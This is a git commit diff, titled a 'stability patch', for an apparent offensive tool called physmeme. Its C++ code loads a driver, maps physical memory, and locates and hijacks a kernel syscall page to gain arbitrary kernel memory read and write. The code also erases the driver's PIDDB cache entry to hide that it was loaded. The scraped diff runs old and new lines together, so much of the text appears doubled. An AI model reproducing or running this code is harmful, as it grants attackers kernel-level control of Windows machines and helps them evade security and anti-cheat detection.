stability patch for physmeme...

merge-requests/1/merge
xerox 4 years ago
parent 9ab20011fa
commit ea2f644ac0

@ -1,5 +1,4 @@
#include "kernel_ctx.h" #include "kernel_ctx.h"
#include "../mem_ctx/mem_ctx.hpp"
namespace nasa namespace nasa
{ {
@ -8,6 +7,13 @@ namespace nasa
if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer) if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer)
return; return;
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryExA(
"ntoskrnl.exe",
NULL,
DONT_RESOLVE_DLL_REFERENCES
));
nt_rva = reinterpret_cast<std::uint32_t>( nt_rva = reinterpret_cast<std::uint32_t>(
util::get_module_export( util::get_module_export(
"ntoskrnl.exe", "ntoskrnl.exe",
@ -16,13 +22,6 @@ namespace nasa
)); ));
nt_page_offset = nt_rva % PAGE_SIZE; nt_page_offset = nt_rva % PAGE_SIZE;
ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
LoadLibraryExA(
"ntoskrnl.exe",
NULL,
DONT_RESOLVE_DLL_REFERENCES
));
std::vector<std::thread> search_threads; std::vector<std::thread> search_threads;
//--- for each physical memory range, make a thread to search it //--- for each physical memory range, make a thread to search it
for (auto ranges : util::pmem_ranges) for (auto ranges : util::pmem_ranges)
@ -43,29 +42,34 @@ namespace nasa
if (begin + end <= 0x1000 * 512) if (begin + end <= 0x1000 * 512)
{ {
auto page_va = nasa::map_phys(begin + nt_page_offset, end); auto page_va = nasa::map_phys(begin + nt_page_offset, end);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(end);
if (page_va) if (page_va)
{ {
// scan every page of the physical memory range // scan every page of the physical memory range
for (auto page = page_va; page < page_va + end; page += 0x1000) for (auto page = page_va; page < page_va + end; page += 0x1000)
{
if (!is_page_found.load()) // keep scanning until its found if (!is_page_found.load()) // keep scanning until its found
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) {
__try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandleA(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
}
}
nasa::unmap_phys(page_va, end); nasa::unmap_phys(page_va, end);
} }
} }
@ -77,9 +81,6 @@ namespace nasa
for (auto range = begin; range < begin + end; range += 0x1000 * 512) for (auto range = begin; range < begin + end; range += 0x1000 * 512)
{ {
auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512); auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(0x1000 * 512);
if (page_va) if (page_va)
{ {
// loop every page of 2mbs (512) // loop every page of 2mbs (512)
@ -87,21 +88,25 @@ namespace nasa
{ {
if (!is_page_found.load()) if (!is_page_found.load())
{ {
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) __try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
} }
} }
nasa::unmap_phys(page_va, 0x1000 * 512); nasa::unmap_phys(page_va, 0x1000 * 512);
@ -110,30 +115,31 @@ namespace nasa
// map the remainder and check each page of it // map the remainder and check each page of it
auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder); auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder);
last_mapped_virt.store((void*)page_va);
last_mapping_size.store(remainder);
if (page_va) if (page_va)
{ {
for (auto page = page_va; page < page_va + remainder; page += 0x1000) for (auto page = page_va; page < page_va + remainder; page += 0x1000)
{ {
if (!is_page_found.load()) if (!is_page_found.load())
{ {
if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32)) __try
{ {
// if (!memcmp(reinterpret_cast<void*>(page), ntoskrnl_buffer + nt_rva, 32))
// this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! {
// //
psyscall_func.store((void*)page); // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking!
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL)); //
auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId())); psyscall_func.store((void*)page);
auto my_proc_base = reinterpret_cast<std::uintptr_t>(GetModuleHandle(NULL));
if (my_proc_base != my_proc_base_from_syscall) auto my_proc_base_from_syscall = reinterpret_cast<std::uintptr_t>(get_proc_base(GetCurrentProcessId()));
continue;
if (my_proc_base != my_proc_base_from_syscall)
is_page_found.store(true); continue;
return;
is_page_found.store(true);
return;
}
} }
__except (EXCEPTION_EXECUTE_HANDLER) {}
} }
} }
nasa::unmap_phys(page_va, remainder); nasa::unmap_phys(page_va, remainder);
@ -197,12 +203,15 @@ namespace nasa
); );
if (mm_copy_memory) if (mm_copy_memory)
syscall<decltype(&memcpy)>( {
syscall<decltype(&memcpy)>
(
mm_copy_memory, mm_copy_memory,
buffer, buffer,
address, address,
size size
); );
}
} }
void kernel_ctx::wkm(void* buffer, void* address, std::size_t size) void kernel_ctx::wkm(void* buffer, void* address, std::size_t size)
@ -218,12 +227,15 @@ namespace nasa
); );
if (mm_copy_memory) if (mm_copy_memory)
syscall<decltype(&memcpy)>( {
syscall<decltype(&memcpy)>
(
mm_copy_memory, mm_copy_memory,
address, address,
buffer, buffer,
size size
); );
}
} }
void* kernel_ctx::get_physical(void* virt_addr) void* kernel_ctx::get_physical(void* virt_addr)
@ -237,10 +249,7 @@ namespace nasa
"MmGetPhysicalAddress" "MmGetPhysicalAddress"
); );
return syscall<MmGetPhysicalAddress>( return syscall<MmGetPhysicalAddress>(mm_get_physical, virt_addr);
mm_get_physical,
virt_addr
);
} }
void* kernel_ctx::get_virtual(void* addr) void* kernel_ctx::get_virtual(void* addr)
@ -256,10 +265,7 @@ namespace nasa
PHYSICAL_ADDRESS phys_addr; PHYSICAL_ADDRESS phys_addr;
memcpy(&phys_addr, &addr, sizeof(addr)); memcpy(&phys_addr, &addr, sizeof(addr));
return syscall<MmGetVirtualForPhysical>( return syscall<MmGetVirtualForPhysical>(mm_get_virtual,phys_addr);
mm_get_virtual,
phys_addr
);
} }
bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp) bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp)

@ -4,11 +4,10 @@
int __cdecl main(int argc, char** argv) int __cdecl main(int argc, char** argv)
{ {
// only time driver needs to be loaded is to init physmeme/kernel_ctx...
nasa::load_drv(); nasa::load_drv();
nasa::kernel_ctx kernel; nasa::kernel_ctx kernel;
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
std::cout << "[+] flushed PIDDB Cache for physmeme driver..." << std::endl; std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl;
nasa::unload_drv(); nasa::unload_drv();
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } }; const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } };

@ -100,9 +100,6 @@ namespace nasa
void* mem_ctx::set_page(void* addr) void* mem_ctx::set_page(void* addr)
{ {
if (!addr)
return {};
// //
// table entry change. // table entry change.
// //

Loading…
Cancel
Save